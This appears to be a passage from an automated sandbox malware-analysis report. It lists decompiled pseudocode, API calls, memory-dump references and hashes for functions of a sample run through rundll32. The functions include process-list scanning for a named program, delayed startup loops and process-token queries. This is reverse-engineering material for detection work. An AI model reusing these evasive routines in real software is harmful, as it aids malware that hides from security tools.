                                • Opcode ID: 67074250ceb82e81dfd10429371bacaf1855fad4ae87636f9f1474fb5ac9bae2
                                • Instruction ID: ef97277ed2861fda3e9307afeacccd4af1018df2e0157fe92c2f6752641ded2b
                                • Opcode Fuzzy Hash: 67074250ceb82e81dfd10429371bacaf1855fad4ae87636f9f1474fb5ac9bae2
                                • Instruction Fuzzy Hash: FB01B571605315AFD3208F69DC49E3BBB9CFFC6AA4F110E1AF841D7260DB64D801D6A4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0481513E, Relevance: 6.0, APIs: 4, Instructions: 41processCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E0481513E() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x481a2d4; // 0x20bd5a8
						_t2 = _t9 + 0x481bdd4; // 0x73617661
						_push( &_v264);
						if( *0x481a118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}









                                0x04815149
                                0x04815153
                                0x04815157
                                0x04815161
                                0x04815192
                                0x04815168
                                0x0481516d
                                0x0481517a
                                0x04815183
                                0x0481519a
                                0x04815185
                                0x0481518d
                                0x00000000
                                0x0481518d
                                0x0481519b
                                0x0481519c
                                0x00000000
                                0x0481519c
                                0x00000000
                                0x04815196
                                0x048151a2
                                0x048151a7

                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0481514E
                                • Process32First.KERNEL32(00000000,?), ref: 04815161
                                • Process32Next.KERNEL32(00000000,?), ref: 0481518D
                                • CloseHandle.KERNEL32(00000000), ref: 0481519C
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                • String ID:
                                • API String ID: 420147892-0
                                • Opcode ID: 1a54680a9ee7d08cdd90b888a6afbac0df9169298b7d61440baf43ce97662f78
                                • Instruction ID: e6c9b585befb7c3bdccfae28090171527018548afca0c2c1fe9c688c43e7b40a
                                • Opcode Fuzzy Hash: 1a54680a9ee7d08cdd90b888a6afbac0df9169298b7d61440baf43ce97662f78
                                • Instruction Fuzzy Hash: 1AF0BBB170112476E722EA76DC48DDB77ACDBC4718F000F63ED45D2020F674ED4686A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 048110DD, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E048110DD(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x481a37c; // 0x68d9630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x481a37c; // 0x68d9630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x481a030) {
					HeapFree( *0x481a290, 0, _t8);
				}
				_t14[1] = E0481578C(_v0, _t14);
				_t11 =  *0x481a37c; // 0x68d9630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                0x048110dd
                                0x048110dd
                                0x048110e6
                                0x048110f6
                                0x048110f6
                                0x048110fb
                                0x04811100
                                0x00000000
                                0x00000000
                                0x048110f0
                                0x048110f0
                                0x04811102
                                0x04811106
                                0x04811118
                                0x04811118
                                0x04811128
                                0x0481112b
                                0x04811130
                                0x04811134
                                0x0481113a

                                APIs
                                • RtlEnterCriticalSection.NTDLL(068D95F0), ref: 048110E6
                                • Sleep.KERNEL32(0000000A,?,?,048155D3,?,?,?,?,?,04816BD8,?,00000001), ref: 048110F0
                                • HeapFree.KERNEL32(00000000,00000000,?,?,048155D3,?,?,?,?,?,04816BD8,?,00000001), ref: 04811118
                                • RtlLeaveCriticalSection.NTDLL(068D95F0), ref: 04811134
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: d042f9c69c0db9608b1c76817865dde404d476ea8605d76afc7533dff84ba399
                                • Instruction ID: 56fb5af69fe853b81d6851efa478109a138444d734d6bbeede281b47858925e5
                                • Opcode Fuzzy Hash: d042f9c69c0db9608b1c76817865dde404d476ea8605d76afc7533dff84ba399
                                • Instruction Fuzzy Hash: CAF034B0702250DBE724AFB8E849B1AB7ACEB08744B048D03F645D7271C628EC00CB25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04815076, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04815076() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x481a2c4; // 0x34c
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x481a308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x481a2c4; // 0x34c
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x481a290; // 0x64e0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                0x04815076
                                0x0481507d
                                0x048150c7
                                0x048150c9
                                0x048150c9
                                0x04815081
                                0x04815087
                                0x0481508c
                                0x04815090
                                0x04815096
                                0x0481509d
                                0x00000000
                                0x00000000
                                0x0481509f
                                0x048150a4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x048150a4
                                0x048150a6
                                0x048150ae
                                0x048150b1
                                0x048150b1
                                0x048150b7
                                0x048150be
                                0x048150c1
                                0x048150c1
                                0x00000000

                                APIs
                                • SetEvent.KERNEL32(0000034C,00000001,048156C9), ref: 04815081
                                • SleepEx.KERNEL32(00000064,00000001), ref: 04815090
                                • CloseHandle.KERNEL32(0000034C), ref: 048150B1
                                • HeapDestroy.KERNEL32(064E0000), ref: 048150C1
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CloseDestroyEventHandleHeapSleep
                                • String ID:
                                • API String ID: 4109453060-0
                                • Opcode ID: 32c22b18ac606fbd51373097314ebd35e4e2cba257bc3bd2a89818bf8e882801
                                • Instruction ID: 8f052b6c3336184f87cc1ab8f52b6886c3d98b70eb81f0fe9477547a2a575a7e
                                • Opcode Fuzzy Hash: 32c22b18ac606fbd51373097314ebd35e4e2cba257bc3bd2a89818bf8e882801
                                • Instruction Fuzzy Hash: 67F0C0B1B02311ABEB24BEB5D95CB5637ACEB44B61B040E57FC05D71A4DA2DEC40C990
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 048150DF, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E048150DF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x481a37c; // 0x68d9630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x481a37c; // 0x68d9630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x481a37c; // 0x68d9630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x481b83e) {
					HeapFree( *0x481a290, 0, _t10);
					_t7 =  *0x481a37c; // 0x68d9630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                0x048150df
                                0x048150e8
                                0x048150f8
                                0x048150f8
                                0x048150fd
                                0x04815102
                                0x00000000
                                0x00000000
                                0x048150f2
                                0x048150f2
                                0x04815104
                                0x04815109
                                0x0481510d
                                0x04815120
                                0x04815126
                                0x04815126
                                0x0481512f
                                0x04815131
                                0x04815135
                                0x0481513b

                                APIs
                                • RtlEnterCriticalSection.NTDLL(068D95F0), ref: 048150E8
                                • Sleep.KERNEL32(0000000A,?,?,048155D3,?,?,?,?,?,04816BD8,?,00000001), ref: 048150F2
                                • HeapFree.KERNEL32(00000000,?,?,?,048155D3,?,?,?,?,?,04816BD8,?,00000001), ref: 04815120
                                • RtlLeaveCriticalSection.NTDLL(068D95F0), ref: 04815135
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID:
                                • API String ID: 58946197-0
                                • Opcode ID: d4185bc7b5eab3600e54e138530d177e3cd68f3bf1ccf383271d13ff61151dfb
                                • Instruction ID: 10e6cfe3f68020e7c14d23a7c62312b5933402f71191779ff63a59be780a6c99
                                • Opcode Fuzzy Hash: d4185bc7b5eab3600e54e138530d177e3cd68f3bf1ccf383271d13ff61151dfb
                                • Instruction Fuzzy Hash: 6AF0D4B4601200EBE718AF68E869B2537ACEB48B09B054D1BE906D7370D738EC00DA21
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04813D98, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E04813D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E04816837(_t2);
				if(_t34 != 0) {
					_t30 = E04816837(_t28);
					if(_t30 == 0) {
						E048150CA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E048177DD(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E048177DD(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                0x04813d98
                                0x04813da2
                                0x04813da4
                                0x04813daa
                                0x04813daa
                                0x04813db3
                                0x04813db7
                                0x04813dc3
                                0x04813dc7
                                0x04813e3b
                                0x04813dc9
                                0x04813dc9
                                0x04813dcd
                                0x04813dd4
                                0x04813dd7
                                0x04813df1
                                0x04813de0
                                0x04813de0
                                0x04813de4
                                0x04813de7
                                0x04813dec
                                0x04813dec
                                0x04813df6
                                0x04813e1e
                                0x04813e24
                                0x04813e27
                                0x04813df8
                                0x04813dfa
                                0x04813e02
                                0x04813e0d
                                0x04813e12
                                0x04813e12
                                0x04813e2e
                                0x04813e35
                                0x04813e36
                                0x04813e36
                                0x04813dc7
                                0x04813e46

                                APIs
                                • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,04813CEE,00000000,00000000,00000000,068D9698,?,?,0481106E,?,068D9698), ref: 04813DA4
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                  • Part of subcall function 048177DD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04813DD2,00000000,00000001,00000001,?,?,04813CEE,00000000,00000000,00000000,068D9698), ref: 048177EB
                                  • Part of subcall function 048177DD: StrChrA.SHLWAPI(?,0000003F,?,?,04813CEE,00000000,00000000,00000000,068D9698,?,?,0481106E,?,068D9698,0000EA60,?), ref: 048177F5
                                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04813CEE,00000000,00000000,00000000,068D9698,?,?,0481106E), ref: 04813E02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04813E12
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 04813E1E
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                • String ID:
                                • API String ID: 3767559652-0
                                • Opcode ID: e61451813e174982325d90bcebb84a59a5e613476f5eb053994ba92380377b61
                                • Instruction ID: 46e80da21d1ca8085badae268fd3db9e629ea8bc8fb9013aed8293be2d1fa43d
                                • Opcode Fuzzy Hash: e61451813e174982325d90bcebb84a59a5e613476f5eb053994ba92380377b61
                                • Instruction Fuzzy Hash: D621A2B2900255ABEB12AF68C894AAA7FBCDF0A244F044956FC05DB221E774E941D7A1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04815D37, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E04815D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E04816837(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                0x04815d4c
                                0x04815d50
                                0x04815d5a
                                0x04815d61
                                0x04815d64
                                0x04815d66
                                0x04815d6e
                                0x04815d73
                                0x04815d81
                                0x04815d86
                                0x04815d90

                                APIs
                                • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,068D92FC,?,04811B37,004F0053,068D92FC,?,?,?,?,?,?,048120B0), ref: 04815D47
                                • lstrlenW.KERNEL32(04811B37,?,04811B37,004F0053,068D92FC,?,?,?,?,?,?,048120B0), ref: 04815D4E
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,04811B37,004F0053,068D92FC,?,?,?,?,?,?,048120B0), ref: 04815D6E
                                • memcpy.NTDLL(751469A0,04811B37,00000002,00000000,004F0053,751469A0,?,?,04811B37,004F0053,068D92FC), ref: 04815D81
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlenmemcpy$AllocateHeap
                                • String ID:
                                • API String ID: 2411391700-0
                                • Opcode ID: e03263321a4911b53a8a73db2de302b12a324f779048e41bf9c16172cf38ac30
                                • Instruction ID: edf8aef50661ead3278a25d3ba460194e7d489e4454f27b19b3c44734b2062be
                                • Opcode Fuzzy Hash: e03263321a4911b53a8a73db2de302b12a324f779048e41bf9c16172cf38ac30
                                • Instruction Fuzzy Hash: F9F04976900118BBCF10EFA8CC84CDE7BACEF082987014563F908E7211E775EA149BA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 048121C1, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(068D87FA,00000000,00000000,00000000,04817100,00000000), ref: 048121D1
                                • lstrlen.KERNEL32(?), ref: 048121D9
                                  • Part of subcall function 04816837: RtlAllocateHeap.NTDLL(00000000,00000000,04814197), ref: 04816843
                                • lstrcpy.KERNEL32(00000000,068D87FA), ref: 048121ED
                                • lstrcat.KERNEL32(00000000,?), ref: 048121F8
                                Memory Dump Source
                                • Source File: 00000004.00000002.400703492.0000000004811000.00000020.00000001.sdmp, Offset: 04810000, based on PE: true
                                • Associated: 00000004.00000002.400699307.0000000004810000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400709736.0000000004819000.00000002.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400713876.000000000481A000.00000004.00000001.sdmp Download File
                                • Associated: 00000004.00000002.400718371.000000000481C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                • String ID:
                                • API String ID: 74227042-0
                                • Opcode ID: 34468215b58a8db0f157c394cfbc02b616e0887bc8e0fa2348ba357b5137b220
                                • Instruction ID: bb8e63d0d01c6c4f8e3b2ac9ecf484b80860e23326bcb2c2eeb2966d2ffb5c18
                                • Opcode Fuzzy Hash: 34468215b58a8db0f157c394cfbc02b616e0887bc8e0fa2348ba357b5137b220
                                • Instruction Fuzzy Hash: FDE012B3901225678711ABE8AC48CAFBBADEF896517050C57FA04E3120C768DD05DBA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Analysis Process: rundll32.exe PID: 5528 Parent PID: 4632 rundll32.exeCOMMON

                                Executed Functions

                                Function 04196B0F, Relevance: 10.6, APIs: 7, Instructions: 72sleepmemorytimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 73%
                                			E04196B0F(void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				void* _t33;
				signed int _t40;

				_t33 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x419a290 = _t14;
				if(_t14 != 0) {
					 *0x419a180 = GetTickCount();
					_t16 = E04194C1B(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
						_push(0);
						_push(9);
						_push(_t29 >> 7);
						_push(_t20);
						L04197EEA();
						_t40 = _t18 + _t20;
						_t22 = E0419414A(_a4, _t40);
						_t23 = 2;
						Sleep(_t23 << _t40); // executed
					} while (_t22 == 1);
					_t25 =  *0x419a2ac; // 0x354
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x419a2b8 = 1;
						}
					}
					_t16 = E041953F2(_t33);
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}
















                                0x04196b0f
                                0x04196b24
                                0x04196b2c
                                0x04196b31
                                0x04196b44
                                0x04196b49
                                0x04196b50
                                0x04196bd8
                                0x04196bde
                                0x00000000
                                0x00000000
                                0x00000000
                                0x04196b56
                                0x04196b56
                                0x04196b5b
                                0x04196b61
                                0x04196b67
                                0x04196b71
                                0x04196b75
                                0x04196b76
                                0x04196b7b
                                0x04196b7c
                                0x04196b7d
                                0x04196b82
                                0x04196b88
                                0x04196b91
                                0x04196b97
                                0x04196b9d
                                0x04196ba2
                                0x04196ba9
                                0x04196bad
                                0x04196bb5
                                0x04196bbd
                                0x04196bbf
                                0x04196bbf
                                0x04196bc7
                                0x04196bc9
                                0x04196bc9
                                0x04196bc7
                                0x04196bd3
                                0x00000000
                                0x04196bd3
                                0x04196b35
                                0x00000000

                                APIs
                                • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04196B24
                                • GetTickCount.KERNEL32 ref: 04196B3B
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 04196B5B
                                • SwitchToThread.KERNEL32(?,00000001), ref: 04196B61
                                • _aullrem.NTDLL(?,?,00000009,00000000), ref: 04196B7D
                                • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 04196B97
                                • IsWow64Process.KERNEL32(00000354,?,?,00000001), ref: 04196BB5
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                • String ID:
                                • API String ID: 3690864001-0
                                • Opcode ID: b76a6b50eead598c91de5f064f5f0062c58d524d93e3b981926cfa548e28e95f
                                • Instruction ID: de8e3b046cfe8a3804f7fb6988e353627c571c15a0511c1d3861b2a4117bcd67
                                • Opcode Fuzzy Hash: b76a6b50eead598c91de5f064f5f0062c58d524d93e3b981926cfa548e28e95f
                                • Instruction Fuzzy Hash: 352102F2B04214BFDB109F66D8D9A2A77DCFB44350F00492DF51AC2240EB79AC888B65
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 04195685, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t13;

				_t13 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x419a294) == 0) {
						E04195076();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x419a294) == 1) {
						_t10 = E04196B0F(_t11, _a4); // executed
						if(_t10 != 0) {
							_t13 = 0;
						}
					}
				}
				return _t13;
			}







                                0x0419568c
                                0x0419568d
                                0x04195690
                                0x041956c2
                                0x041956c4
                                0x041956c4
                                0x04195692
                                0x04195693
                                0x041956a8
                                0x041956af
                                0x041956b1
                                0x041956b1
                                0x041956af
                                0x04195693
                                0x041956cc

                                APIs
                                • InterlockedIncrement.KERNEL32(0419A294), ref: 0419569A
                                  • Part of subcall function 04196B0F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 04196B24
                                • InterlockedDecrement.KERNEL32(0419A294), ref: 041956BA
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Interlocked$CreateDecrementHeapIncrement
                                • String ID:
                                • API String ID: 3834848776-0
                                • Opcode ID: bb8faef38c1c0ec6a25e9aa86293efa1185b602ca32e81f7e3a3bc44a21ad433
                                • Instruction ID: 72e32fd26b832272938fb458ed062efc304bd923a484ba7009737339a01550d8
                                • Opcode Fuzzy Hash: bb8faef38c1c0ec6a25e9aa86293efa1185b602ca32e81f7e3a3bc44a21ad433
                                • Instruction Fuzzy Hash: 85E01A36B04222779F272A64D984A9A67D6AB43BC4B058454E681E1028EB15BC50C6E1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 04192D06, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 22%
                                			E04192D06(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43);
						_t44 = E04196837(_a4);
						if(_t44 != 0) {
							_push( &_a4);
							_push(_a4);
							_push(_t44);
							_push(1);
							_push(_v8);
							if( *_t47() >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E041950CA(_t44);
						}
						NtClose(_v8);
					}
					NtClose(_v12);
				}
				return _t48;
			}


















                                0x04192d13
                                0x04192d14
                                0x04192d15
                                0x04192d16
                                0x04192d17
                                0x04192d1b
                                0x04192d22
                                0x04192d31
                                0x04192d34
                                0x04192d37
                                0x04192d3e
                                0x04192d41
                                0x04192d44
                                0x04192d47
                                0x04192d4a
                                0x04192d55
                                0x04192d57
                                0x04192d60
                                0x04192d68
                                0x04192d6a
                                0x04192d7c
                                0x04192d86
                                0x04192d8a
                                0x04192d8f
                                0x04192d90
                                0x04192d93
                                0x04192d94
                                0x04192d96
                                0x04192d9d
                                0x04192da6
                                0x04192dae
                                0x04192dae
                                0x04192db0
                                0x04192db0
                                0x04192db8
                                0x04192dbe
                                0x04192dc2
                                0x04192dc2
                                0x04192dcd

                                APIs
                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04192D4D
                                • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 04192D60
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04192D7C
                                  • Part of subcall function 04196837: RtlAllocateHeap.NTDLL(00000000,00000000,04194197), ref: 04196843
                                • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 04192D99
                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04192DA6
                                • NtClose.NTDLL(00000000), ref: 04192DB8
                                • NtClose.NTDLL(00000000), ref: 04192DC2
                                Memory Dump Source
                                • Source File: 00000005.00000002.392192589.0000000004191000.00000020.00000001.sdmp, Offset: 04190000, based on PE: true
                                • Associated: 00000005.00000002.392186274.0000000004190000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392200485.0000000004199000.00000002.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392205202.000000000419A000.00000004.00000001.sdmp Download File
                                • Associated: 00000005.00000002.392213010.000000000419C000.00000002.00000001.sdmp Download File
                                Similarity
                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                • String ID:
                                • API String ID: 2575439697-0
                                • Opcode ID: 68b94ab37a3d701fc8b7157ab504e25572c8af10525d179ea082a27366b635d1
                                • Instruction ID: 2a98aa8c60e701212fb8cb6a182c18677dcde1eb29beb91284f48b02c3c110ee
                                • Opcode Fuzzy Hash: 68b94ab37a3d701fc8b7157ab504e25572c8af10525d179ea082a27366b635d1
